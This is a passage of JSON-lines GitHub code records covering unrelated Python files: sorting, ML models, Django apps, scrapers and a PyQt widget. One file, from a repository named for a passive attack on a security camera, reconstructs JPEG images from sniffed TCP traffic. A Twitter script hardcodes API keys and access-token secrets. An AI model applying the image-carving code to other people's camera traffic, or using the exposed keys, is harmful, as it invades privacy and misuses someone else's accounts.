#starts printing text with date timestamp with the given format (default = \"dd/mm/yy\")\n# log.enable_time_timestamp(\"hh:mm:ss\") #stars printing text with time timestamp with the given format (default = \"hh:mm:ss\")\n# log.disable_colors()\n# log.enable_colors()\n\n# stuff to test: template method, strategy, classes/inheritance, composition, many little classes combined into one\n\n# implementing your own logger\n\nfrom logger import log_context, custom_logger\nfrom pathlib import Path\n\n\nclass MyLogger(custom_logger.MiniLog):\n def log(self, text):\n print(text)\n\n\nlog_context.set_logger(MyLogger())\n\nlog_context.log(\"text\")\n","repo_name":"Cogno-Marco/YetAnotherPyLogger","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"6195389518","text":"#----------Merge Sort----------#\r\n\r\ndef mergeSortedLists(list1,list2):\r\n newArray=[]\r\n i=0; j=0\r\n while (i < len(list1) and j < len(list2)):\r\n if (list1[i] < list2[j]):\r\n newArray.append(list1[i])\r\n i+=1\r\n else:\r\n newArray.append(list2[j])\r\n j+=1\r\n while (i < len(list1)): #Add remaining elements of the list that contains more elements than the other\r\n newArray.append(list1[i])\r\n i+=1\r\n while (j < len(list2)): #Add remaining elements of the list that contains more elements than the other\r\n newArray.append(list2[j])\r\n j+=1\r\n return newArray\r\n\r\ndef mergeSort(list):\r\n print(\"Incoming list: \",list)\r\n if (len(list)<=1):\r\n return list\r\n middle=len(list)//2\r\n leftList=mergeSort(list[:middle])\r\n rightList=mergeSort(list[middle:])\r\n newList=mergeSortedLists(leftList,rightList)\r\n print(\"Outgoing list: \",list)\r\n return newList\r\n\r\n#------------------------------#\r\n\r\nimport random\r\n\r\ndizi=[]\r\nfor i in range(0,10):\r\n dizi.append(random.randint(10,100))\r\n\r\nnewList=mergeSort(dizi)\r\nprint(newList)\r\n\r\nmergeSort(newList)\r\n\r\n#------------------------------#","repo_name":"ErenGaripagaoglu/Python-VeriYapilari","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41233715513","text":"import torch\nimport torch.nn as nn\nfrom reagent import types as rlt\nfrom reagent.models.base import ModelBase\n\n\nclass Seq2RewardNetwork(ModelBase):\n def __init__(self, state_dim, action_dim, num_hiddens, num_hidden_layers):\n super().__init__()\n\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.num_hiddens = num_hiddens\n self.num_hidden_layers = num_hidden_layers\n self.rnn = nn.LSTM(\n input_size=action_dim, hidden_size=num_hiddens, num_layers=num_hidden_layers\n )\n\n self.lstm_linear = nn.Linear(num_hiddens, 1)\n self.map_linear = nn.Linear(state_dim, self.num_hiddens)\n\n def input_prototype(self):\n return (\n rlt.FeatureData(torch.randn(1, 1, self.state_dim)),\n rlt.FeatureData(torch.randn(1, 1, self.action_dim)),\n )\n\n def forward(self, state: rlt.FeatureData, action: rlt.FeatureData):\n \"\"\" Forward pass of Seq2Reward\n\n Takes in the current state and use it as init hidden\n The input sequence are pure actions only\n Output the predicted reward after each time step\n\n :param actions: (SEQ_LEN, BATCH_SIZE, ACTION_DIM) torch tensor\n :param states: (SEQ_LEN, BATCH_SIZE, STATE_DIM) torch tensor\n\n :returns: predicated accumulated rewards at last step for the given sequence\n - reward: (BATCH_SIZE, 1) torch tensor\n \"\"\"\n states = state.float_features\n actions = action.float_features\n hidden = self.get_initial_hidden_state(\n states[0][None, :, :], batch_size=states.size(1)\n )\n # use last hidden from the topmost hidden layer to predict reward\n # the size of reward should be converted to (BATCH_SIZE, 1)\n all_steps_hidden, last_step_hidden_and_cell = self.rnn(actions, hidden)\n lstm_outs = self.lstm_linear(last_step_hidden_and_cell[0])\n reward = lstm_outs[-1, :, -1].unsqueeze(1)\n\n return rlt.Seq2RewardOutput(acc_reward=reward)\n\n def get_initial_hidden_state(self, state, batch_size=1):\n # state embedding with linear mapping\n # repeat state to fill num_hidden_layers at first dimension\n state = state.repeat(self.num_hidden_layers, 1, 1)\n state_embed = self.map_linear(state)\n\n # hidden = (hidden,cell) where hidden is init with liner map\n # of input state and cell is 0.\n # hidden :\n # TUPLE(\n # (NUM_LAYERS, BATCH_SIZE, HIDDEN_SIZE),\n # (NUM_LAYERS, BATCH_SIZE, HIDDEN_SIZE)\n # ) torch tensor\n hidden = (\n state_embed,\n torch.zeros(self.num_hidden_layers, batch_size, self.num_hiddens),\n )\n\n return hidden\n","repo_name":"UofT-EcoSystem/rlscope_ReAgent","sub_path":"reagent/models/seq2reward_model.py","file_name":"seq2reward_model.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23788925635","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom caravanamigrante.models import Caravanamigrante\nfrom authuser.models import AuthUser\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Migrante(models.Model):\n\n GENERO_CHOICE = (\n ('M', 'MASCULINO'),\n ('F', 'FEMENINO'),\n ('O', 'OTRO'),\n )\n\n\n idmigrante = models.AutoField(db_column='IdMigrante', primary_key=True) \n nombre = models.CharField('Nombre:', db_column='Nombre', max_length=50) \n apellido = models.CharField('Apellido:', db_column='Apellido', max_length=50) \n telefono = models.CharField('Teléfono:', db_column='Telefono', max_length=16) \n genero = models.CharField('Género:', db_column='Genero', choices=GENERO_CHOICE, max_length=1)\n fechanacimiento = models.DateField('Fecha de Nacimiento:', db_column='FechaNacimiento')\n nacionalidad = models.CharField('Nacionalidad:', db_column='Nacionalidad', max_length=50)\n caravana = models.ForeignKey(Caravanamigrante, on_delete=models.CASCADE, blank=True, null=True) \n usuario = models.ForeignKey(User, models.DO_NOTHING, db_column='FKIdUsuario')\n\n def edad(self):\n try:\n cadena = int((timezone.now().date() - self.fechanacimiento).days / 365.25)\n return cadena\n except:\n cadena = []\n return cadena\n\n def __str__(self):\n return '%s %s' % (self.nombre, self.apellido)\n\n class Meta:\n verbose_name = 'Migrante'\n verbose_name_plural = 'Migrantes'","repo_name":"lisdy20/Proyecto","sub_path":"migrante/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72437050504","text":"from django.shortcuts import render, redirect\nfrom .models import Dojos, Ninjas\n\ndef index(request):\n context = {\n 'dojos' : Dojos.objects.all()\n }\n return render(request, \"index.html\", context)\n\ndef add_ninja(request):\n print(request.POST)\n print('Creating ninja')\n #get dojo instance\n dojo_instance = Dojos.objects.get(id=request.POST['dojo_id'])\n ninja = Ninjas.objects.create(\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n dojo = dojo_instance\n )\n print(ninja)\n return redirect('/')\n\n\ndef add_dojo(request):\n print(request.POST)\n print('Creating dojo')\n dojo = Dojos.objects.create(\n name=request.POST['name'],\n city=request.POST['city'],\n state=request.POST['state']\n )\n print(dojon)\n return redirect('/')\n","repo_name":"bellos711/python_practice","sub_path":"django/django_orm/dojo_n_ninjas/dojoninja_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73534940105","text":"import threading\nimport time\nfrom queue import Queue\nimport requests\nimport json\nimport csv\ndef solicitacao(url):\n \n resp = json.loads(requests.get(url).text)\n outputFile = open('COVID-19 CORONAVIRUS OUTBREAK.csv',\t'w',\tnewline='')\n outputWriter = csv.writer(outputFile)\n outputWriter.writerow(['Date', 'countrie', 'TotalDeaths', 'SeriousCases','TotalCases'])\n print(\"countrie Total Cases\")\n with conteudo:\n for elem in resp:\n print(\"%s %s \"%(elem['name'],elem['totalCases']))\n outputWriter.writerow([elem['updatedAt'],elem['name'],elem['totalCases'],elem['totalDeaths'],elem['seriousCases']])\n outputFile.close()\n\ndef gerenciador():\n\n while True:\n url_presente = fila.get()\n solicitacao(url_presente)\n fila.task_done()\n\nquantidade_threads = 5\nconteudo = threading.Lock()\nfila = Queue()\nurl = \"https://exchange.vcoud.com/coronavirus/latest\"\nfor i in range(quantidade_threads):\n t = threading.Thread(target=gerenciador)\n t.daemon = True\n t.start()\n start = time.time()\n fila.put(url)\nfila.join()\nprint((time.time() - start))\n","repo_name":"cardosource/COVID-19-CORONAVIRUS-OUTBREAK","sub_path":"COVID-19 CORONAVIRUS OUTBREAK.py","file_name":"COVID-19 CORONAVIRUS OUTBREAK.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22278490714","text":"from PIL import Image\nfrom scapy.all import *\nimport os\nimport shutil\nimport extractFileTCP\n\nglobal fileLen;\nnumOfImage = 0\nglobal stop\nii = 0\nglobal data\nglobal pl\ndirName = 'outputDir/'\npath = \"outputDir/\"\n\n# Creates folder that contains all the extracted images from the TCP raws\ndef createImagesFolder():\n try:\n #os.remove('rawBytesFile')\n # Create target Directory\n os.mkdir(dirName)\n except FileExistsError:\n # if target Directory exist, it delete the directory and all its containment\n shutil.rmtree(dirName, ignore_errors=True)\n # Then creates target Directory\n os.mkdir(dirName)\n return dirName\n\n\ndef openImage(imageName):\n img = Image.open(imageName)\n img.show()\n\n# create the image file , from raw data bytes array , using startImage and endImage indexes\ndef createImage(startImageIndex, endImageIndex, numOfImage=None):\n fileName = \"image{0}.jpg\".format(numOfImage)\n fullpath = os.path.join(path, fileName)\n\n with open(fullpath, 'wb') as f:\n f.write(data[startImageIndex:endImageIndex])\n if endImageIndex < fileLen:\n numOfImage += 1\n print(\"create new image\")\n findStartOfImage(endImageIndex, numOfImage)\n\n\n# extract the end of the image index by find the (ffd90d0a) value in raw bytes array relatively to idxStartImage\ndef findEndOfImage(idxStartImage,numOfImage=None):\n # pl contains all the tcp stream extracted from the pcap file\n ii = idxStartImage\n len = pl.__len__()\n while (ii+3) < len:\n hexVal = hex(pl[ii])\n hexValAfter1 = hex(pl[ii + 2]) #A variable that keeps '0d'\n hexValAfter2 = hex(pl[ii + 3]) #A variable that keeps '0a'\n # check if hexVal variable is 'ff' in Hex\n if hexVal == '0xff':\n nextHexVal = hex(pl[ii + 1])\n # check if nextHexVal variable is 'd9' in Hex\n if nextHexVal == '0xd9':\n #Check if those variables contain '0a' and '0d'\n if hexValAfter1 == '0xd' and hexValAfter2 == '0xa':\n idxEndImage=ii\n createImage(idxStartImage, idxEndImage,numOfImage)\n ii += 1\n\n# extract the end of the image index by find the (0d0affd8) value in raw bytes array relatively to last startIndex\ndef findStartOfImage(startIndex,numOfImage=None):\n\n ii = startIndex\n len = pl.__len__()\n while (ii + 3) < len:\n hexVal = hex(pl[ii])\n if ii > 2:\n hexValBefor1 = hex(pl[ii-1]) #A variable that keeps '0a'\n hexValBefor2 = hex(pl[ii-2]) #A variable that keeps '0d'\n\n # check if hexVal variable is 'ff' in Hex\n if hexVal == '0xff':\n # Check if those variables contain '0a' and '0d'\n if hexValBefor1 == '0xa' and hexValBefor2 == '0xd':\n nextHexVal = hex(pl[ii+1])\n # check if nextHexVal variable is 'd8' in Hex\n if nextHexVal == '0xd8':\n findEndOfImage(ii,numOfImage)\n ii += 1\n\n\n# if __name__ == '__main__':\n# createImagesFolder()\n# fname=extractFileTCP.TcpPcapToRawBytesFile()\n# with open(fname, 'rb') as f:\n# data = f.read()\n# # pl contains all the tcp stream extracted from the pcap file\n# pl = ([p for p in data])\n# file_stats = os.stat(fname)\n# fileLen = file_stats.st_size\n# print(\"fileLen = %d\",fileLen)\n# findStartOfImage(0, numOfImage)\n","repo_name":"OdeliaHochman/Passive-Attack-on-a-Security-Camera","sub_path":"convertTcpStreamToImages.py","file_name":"convertTcpStreamToImages.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"2574143790","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, data):\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n def detectLoop(self):\n slow_ptr = self.head\n fast_ptr = self.head\n while slow_ptr and fast_ptr and fast_ptr.next:\n slow_ptr = slow_ptr.next\n fast_ptr = fast_ptr.next.next\n if slow_ptr == fast_ptr:\n return True\n else:\n return False\n\n def printList(self):\n temp = self.head\n while temp:\n print(temp.data)\n temp = temp.next\n\n\nllist = LinkedList()\nllist.push(20)\nllist.push(4)\nllist.push(15)\nllist.push(10)\n\n# Create a loop for testing\nllist.head.next.next.next.next = llist.head\nif llist.detectLoop():\n print(\"yes\")\nelse:\n print(\"no\")","repo_name":"mrunalhirve12/Interviews2","sub_path":"LinkedList/Detect Loop.py","file_name":"Detect Loop.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14029546454","text":"#-*- coding: utf-8 -*-\n#矩阵入库\nimport face_recognition as fr\nimport numpy as np\nimport pymysql\n\n\ndb = pymysql.connect(\"localhost\",\"root\",\"\",\"baiduyun\" )\ncursor = db.cursor()\nsql = \"select * from face where tzm=0 order by id asc\"\ncursor.execute(sql)\nresults = cursor.fetchall()\nfor row in results:\n\tid = row[0]\n\tname = row[1]\n\timg = row[2]\n\timg_a = fr.load_image_file(img)\n\t#特征码转换矩阵\n\ttry:\n\t\tencoding_a = fr.face_encodings(img_a,known_face_locations=None, num_jitters=0)[0] #0池化操作。数值越高,精度越高,但耗时越长\n\t\t\n\t\tencoding__array_list = encoding_a.tolist()\n\t\t# 将列表里的元素转化为字符串\n\t\tencoding_str_list = [str(i) for i in encoding__array_list]\n\t\t# 拼接列表里的字符串\n\t\tencoding_str = ','.join(encoding_str_list)\n\texcept IndexError:\n\t\tprint (\"Error: 没有识别人脸\")\n\t\tencoding_str = str(0)\n\telse:\n\t\tprint ('ok')\n\t#为了入库 numpy.darray转换list\n\tins = \"update face set tzm='\"+encoding_str+\"' where id=\" + str(id)\n\tcursor.execute(ins)\n\tdb.commit()\n\t\ndb.close()\t\t \n\n\n\n","repo_name":"jyht/ai","sub_path":"insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22012425427","text":"import tensorflow as tf\nimport tf_utils_subspace\nimport parser_ops\n\nparser = parser_ops.get_parser()\nargs = parser.parse_args()\n\n\nclass data_consistency():\n \"\"\"\n Data consistency class can be used for:\n -performing E^h*E operation in the paper\n -transforming final network output to kspace\n \"\"\"\n\n def __init__(self, sens_maps, mask, basis, stk):\n with tf.name_scope('EncoderParams'):\n self.shape_list = tf.shape(mask)\n self.sens_maps = sens_maps\n self.mask = mask\n self.basis = basis\n self.stk = stk\n self.shape_list = tf.shape(mask)\n self.scalar = tf.complex(tf.sqrt(tf.to_float(self.shape_list[0] * self.shape_list[1])), 0.)\n\n def EhE_Op(self, img, mu):\n \"\"\"\n Performs (E^h*E+ mu*I) x\n \"\"\"\n with tf.name_scope('EhE'):\n for kk in range(args.nbasis_GLOB):\n coil_imgs_ = self.sens_maps * img[..., kk]\n kspace_ = tf.expand_dims(tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(coil_imgs_))) / self.scalar, axis=-1)\n if kk == 0:\n kspace = kspace_\n else:\n kspace = tf.concat([kspace, kspace_], axis=-1)\n\n kspace_r = tf_utils_subspace.tf_complex2real(kspace)\n masked_kspace_r = tf.reduce_sum(tf.reshape(kspace_r[..., 0], [args.ncoil_GLOB, args.nrow_GLOB, args.ncol_GLOB, 1, args.nbasis_GLOB]) * \\\n tf.transpose(self.stk, perm=[2, 0, 1, 3, 4]), axis=-1, keepdims=True)\n masked_kspace_i = tf.reduce_sum(tf.reshape(kspace_r[..., 1], [args.ncoil_GLOB, args.nrow_GLOB, args.ncol_GLOB, 1, args.nbasis_GLOB]) * \\\n tf.transpose(self.stk, perm=[2, 0, 1, 3, 4]), axis=-1, keepdims=True)\n masked_kspace = tf_utils_subspace.tf_real2complex(tf.concat([masked_kspace_r, masked_kspace_i], axis=-1))\n masked_kspace = tf.reshape(masked_kspace, [args.ncoil_GLOB, args.nrow_GLOB, args.ncol_GLOB, args.nbasis_GLOB])\n\n for kk in range(args.nbasis_GLOB):\n masked_img_ = tf_utils_subspace.tf_ifftshift(tf.ifft2d(tf_utils_subspace.tf_fftshift(masked_kspace[..., kk]))) * self.scalar\n masked_img_comb_ = tf.expand_dims(tf.reduce_sum(masked_img_ * tf.conj(self.sens_maps), axis=0), axis=-1)\n if kk == 0:\n masked_img_comb = masked_img_comb_\n else:\n masked_img_comb = tf.concat([masked_img_comb, masked_img_comb_], axis=-1)\n\n ispace = masked_img_comb + mu * img\n\n return ispace\n\n def SSDU_kspace(self, img):\n \"\"\"\n Transforms unrolled network output to k-space\n and selects only loss mask locations(\\Lambda) for computing loss\n \"\"\"\n\n with tf.name_scope('SSDU_kspace'):\n coil_imgs = self.sens_maps * img\n kspace = tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(coil_imgs))) / self.scalar\n masked_kspace = kspace * self.mask\n\n return masked_kspace\n\n def Supervised_kspace(self, img):\n \"\"\"\n Transforms unrolled network output to k-space\n \"\"\"\n\n with tf.name_scope('Supervised_kspace'):\n coil_imgs = self.sens_maps * img\n kspace = tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(coil_imgs))) / self.scalar\n\n return kspace\n \n def Supervised_single_kspace(self, img):\n \"\"\"\n Transforms unrolled network output to k-space\n \"\"\"\n\n with tf.name_scope('Supervised_kspace'):\n kspace = tf.squeeze(tf_utils_subspace.tf_fftshift(tf.fft2d(tf_utils_subspace.tf_ifftshift(tf.expand_dims(img, axis=0)))), axis=0) / self.scalar\n\n return kspace\n\n def Supervised_single_image(self, kspace):\n \"\"\"\n Transforms unrolled network output to image\n \"\"\"\n\n with tf.name_scope('Supervised_image'):\n image = tf.squeeze(tf_utils_subspace.tf_ifftshift(tf.ifft2d(tf_utils_subspace.tf_fftshift(tf.expand_dims(kspace, axis=0)))), axis=0) * self.scalar\n\n return image\n\n\ndef conj_grad(input_elems, mu_param):\n \"\"\"\n Parameters\n ----------\n input_data : contains tuple of reg output rhs = E^h*y + mu*z , sens_maps and mask\n rhs = nrow x ncol x 2\n sens_maps : coil sensitivity maps ncoil x nrow x ncol\n mask : nrow x ncol\n mu : penalty parameter\n\n Encoder : Object instance for performing encoding matrix operations\n\n Returns\n -------\n data consistency output, nrow x ncol x 2\n\n \"\"\"\n\n rhs, sens_maps, mask, basis, stk = input_elems\n mu_param = tf.complex(mu_param, 0.)\n for kk in range(args.nbasis_GLOB):\n rhs_c_ = tf.expand_dims(tf_utils_subspace.tf_real2complex(rhs[..., kk * 2:(kk + 1) * 2]), axis=-1)\n if kk == 0:\n rhs_c = rhs_c_\n else:\n rhs_c = tf.concat([rhs_c, rhs_c_], axis=-1)\n rhs = rhs_c\n Encoder = data_consistency(sens_maps, mask, basis, stk)\n cond = lambda i, *_: tf.less(i, args.CG_Iter)\n\n def body(i, rsold, x, r, p, mu):\n with tf.name_scope('CGIters'):\n Ap = Encoder.EhE_Op(p, mu)\n alpha = tf.complex(rsold / tf.to_float(tf.reduce_sum(tf.conj(p) * Ap)), 0.)\n x = x + alpha * p\n r = r - alpha * Ap\n rsnew = tf.to_float(tf.reduce_sum(tf.conj(r) * r))\n beta = rsnew / rsold\n beta = tf.complex(beta, 0.)\n p = r + beta * p\n\n return i + 1, rsnew, x, r, p, mu\n\n x = tf.zeros_like(rhs)\n i, r, p = 0, rhs, rhs\n rsold = tf.to_float(tf.reduce_sum(tf.conj(r) * r), )\n loop_vars = i, rsold, x, r, p, mu_param\n cg_out = tf.while_loop(cond, body, loop_vars, name='CGloop', parallel_iterations=1)[2]\n\n for kk in range(args.nbasis_GLOB):\n cg_out_r_ = tf_utils_subspace.tf_complex2real(cg_out[..., kk])\n if kk == 0:\n cg_out_r = cg_out_r_\n else:\n cg_out_r = tf.concat([cg_out_r, cg_out_r_], axis=-1)\n return cg_out_r\n\n\ndef dc_block(rhs, sens_maps, mask, basis, stk, mu):\n \"\"\"\n DC block employs conjugate gradient for data consistency,\n \"\"\"\n\n def cg_map_func(input_elems):\n cg_output = conj_grad(input_elems, mu)\n\n return cg_output\n\n dc_block_output = tf.map_fn(cg_map_func, (rhs, sens_maps, mask, basis, stk), dtype=tf.float32, name='mapCG')\n\n return dc_block_output\n\n\ndef SSDU_kspace_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to k-space at only unseen locations in training (\\Lambda locations)\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def ssdu_map_fn(input_elems):\n nw_output_enc, sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_kspace = Encoder.SSDU_kspace(nw_output_enc)\n\n return nw_output_kspace\n\n masked_kspace = tf.map_fn(ssdu_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='ssdumapFn')\n\n return tf_utils_subspace.tf_complex2real(masked_kspace)\n\n\ndef Supervised_kspace_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to k-space\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def supervised_map_fn(input_elems):\n nw_output_enc, sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_kspace = Encoder.Supervised_kspace(nw_output_enc)\n\n return nw_output_kspace\n\n kspace = tf.map_fn(supervised_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='supervisedmapFn')\n\n return tf_utils_subspace.tf_complex2real(kspace)\n\n\ndef Supervised_single_kspace_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to k-space\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def supervised_map_fn(input_elems):\n nw_output_enc, sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_kspace = Encoder.Supervised_single_kspace(nw_output_enc)\n\n return nw_output_kspace\n\n kspace = tf.map_fn(supervised_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='supervisedmap_single_k_Fn')\n\n return tf_utils_subspace.tf_complex2real(kspace)\n\n\ndef Supervised_single_image_transform(nw_output, sens_maps, mask, basis, stk):\n \"\"\"\n This function transforms unrolled network output to image\n \"\"\"\n\n nw_output = tf_utils_subspace.tf_real2complex(nw_output)\n\n def supervised_map_fn(input_elems):\n nw_output_enc, sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_image = Encoder.Supervised_single_image(nw_output_enc)\n\n return nw_output_image\n\n kspace = tf.map_fn(supervised_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='supervisedmap_single_i_Fn')\n\n return tf_utils_subspace.tf_complex2real(kspace)\n\n","repo_name":"yohan-jun/Zero-DeepSub","sub_path":"data_consistency_subspace.py","file_name":"data_consistency_subspace.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"30836195875","text":"import tweepy\nimport time\nimport sys\n\n#Search\n#Search is rate limited at 180 queries per 15 minute window.\n#https://dev.twitter.com/rest/public/timelines\n\n\nconsumer_key = 'n2WebZuPpCWG9xguQ9Nx6sJLW'\nconsumer_secret = 'WTfshJzVzrSaWuT4hjEtlV6KivAQa79unN9eCCGIrtduQtQ8vr'\naccess_token = '70616645-l81XYFgtS7E9a2WsrlC5OHE8OqM2ywC3aV28MPMMN'\naccess_token_secret = '67r1dgZvJwhse1z8hl026pSsZESwkuzVZfRekBdvvqTct'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\nfilename = 'data38.csv'\n\nsaveFile = open(filename, 'a')\n\nuser_id = ['WarrenBuffett', 'aswathdamodaran']\n#user_id = ['WarrenBuffett']\n\nlistofword = ['hope', 'happy', 'fear', 'worry','nervous','anxious','upset', 'positive', 'negative']\ncompanylist = ['AAPL','Apple Inc']\n\nteststring = 'fear and FEAR and worry and upset and what I can do, NERVOUS'\n\n\n\ndef checkCompany(companylist, str_check_company):\n\n for i in range (len(companylist)):\n if companylist[i].lower() in str_check_company.lower():\n return '1'\n return '0'\n saveFile.write('\\t')\n\ndef checkWord(listofword, str_check_word):\n counter = 0\n frequency = []\n total_number_of_word = len(str_check_word.split())\n frequency.append(total_number_of_word)\n for i in range (len(listofword)):\n y = listofword[i]\n if y in str_check_word.lower():\n counter = str_check_word.lower().count(y)\n frequency.append( counter )\n else:\n frequency.append( 0 )\n #print (listofword[i], counter)\n #print ('\\n')\n return frequency\n#print (frequency)\n\n\ndef getTweet(user_id):\n #initialize a list to hold all the tweepy Tweets\n alltweets = []\n\n #make initial request for most recent tweets (200 is the maximum allowed count)\n new_tweets = api.user_timeline(id=user_id ,count=200)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n\n #save the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n #keep grabbing tweets until there are no tweets left to grab\n while len(new_tweets) > 0:\n print (\"getting tweets before %s\" % (oldest))\n\n #all subsiquent requests use the max_id param to prevent duplicates\n new_tweets = api.user_timeline(id=user_id,count=200,max_id=oldest)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n\n #update the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n print (\"...%s tweets downloaded so far\" % (len(alltweets)))\n\n for tweet in alltweets:\n #transform the tweepy tweets into a 2D array\n outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode(\"utf-8\")] for tweet in alltweets]\n\n\n for i in range(len(outtweets)):\n saveFile.write(user_id)\n saveFile.write('\\t')\n str_check_company = str(outtweets[i][2])\n y = checkCompany(companylist, str_check_company)\n saveFile.write(y)\n saveFile.write('\\t')\n #Frequency_of_word = []\n\n\n Frequency_of_word = checkWord(listofword, str(outtweets[i][2]))\n\n for fre in range (len (Frequency_of_word)) :\n saveFile.write('\\t')\n saveFile.write(str(Frequency_of_word[fre]))\n saveFile.write('\\t')\n\n\n for j in range (len(outtweets[i])):\n# print(outtweets[i][j], end = '\\t')\n saveFile.write(str(outtweets[i][j]))\n saveFile.write('\\t')\n #str_check_company = str(outtweets[i][2])\n print('\\n')\n saveFile.write('[end of tweets here]')\n saveFile.write('\\t')\n saveFile.write('\\n')\n\n\nfor i in range(len(user_id)):\n getTweet(user_id[i])\n\n\n\nsaveFile.close()\n\n################test function###############\n#checkWord(listofword, teststring)","repo_name":"wmisley/tndy-405i-project","sub_path":"assignment_1/twitter_tweet_query.py","file_name":"twitter_tweet_query.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12700369207","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QGroupBox, QCheckBox, QVBoxLayout, QRadioButton, QLabel, QButtonGroup, QMessageBox\n\n\nclass MyRadioButton(QGroupBox):\n\n def __init__(self, parent): # self는 MyApp 객체\n super().__init__()\n self.QMainWidow = parent\n self.setTitle('QRadioButton')\n self.init_ui()\n\n def init_ui(self):\n rbtn1 = QRadioButton('First Button', self)\n rbtn1.setChecked(True)\n\n rbtn2 = QRadioButton(self)\n rbtn2.setText('Second Button')\n\n rbtn3 = QRadioButton(self)\n rbtn3.setText('status Toggle')\n\n self.lbl = QLabel('')\n\n rbtn1.clicked.connect(lambda: self.lbl.setText(rbtn1.text()))\n # rbtn2.clicked.connect(lambda: self.lbl.setText(rbtn2.text()))\n # rbtn1.clicked.connect(lambda state, btn=rbtn1: self.set_lblText(state, btn))\n rbtn2.clicked.connect(lambda state, btn=rbtn2: self.set_lblText(state, btn))\n\n rbtn3.clicked.connect(lambda state, button=rbtn3: self.show_message(state, button))\n\n rbtn3.toggled.connect(lambda: self.QMainWidow.statusBar().showMessage('rbtn {}'.format(rbtn3.isChecked())))\n\n btn_group = QButtonGroup()\n btn_group.addButton(rbtn1)\n btn_group.addButton(rbtn2)\n btn_group.addButton(rbtn3)\n\n vbox = QVBoxLayout()\n vbox.addWidget(rbtn1)\n vbox.addWidget(rbtn2)\n vbox.addWidget(rbtn3)\n vbox.addWidget(self.lbl)\n\n self.setLayout(vbox)\n\n def set_lblText(self, state, button):\n self.lbl.setText(\"state {} button {}\".format(state, button.text()))\n\n def show_message(self, state, button):\n QMessageBox.information(self, 'lambda test', 'rbtn3 text ' + button.text(), QMessageBox.Yes)\n","repo_name":"MinSu-Kim/pyqt_study","sub_path":"widget/radiobutton.py","file_name":"radiobutton.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"2109712693","text":"import os\nimport sys\nimport requests\nimport simplejson as json\nfrom utils import printResponse, enableHttpDebugLevel, formatedLogs\nfrom httpUtils import httpCommonHeaders, getAccessToken, createRealm\nfrom protocolMapper import ProtocolMapper\nfrom protocols import Protocols\n\n# from dotenv import load_dotenv\n# load_dotenv()\n\ntry:\n if os.environ[\"HTTP_DEBUG\"] == 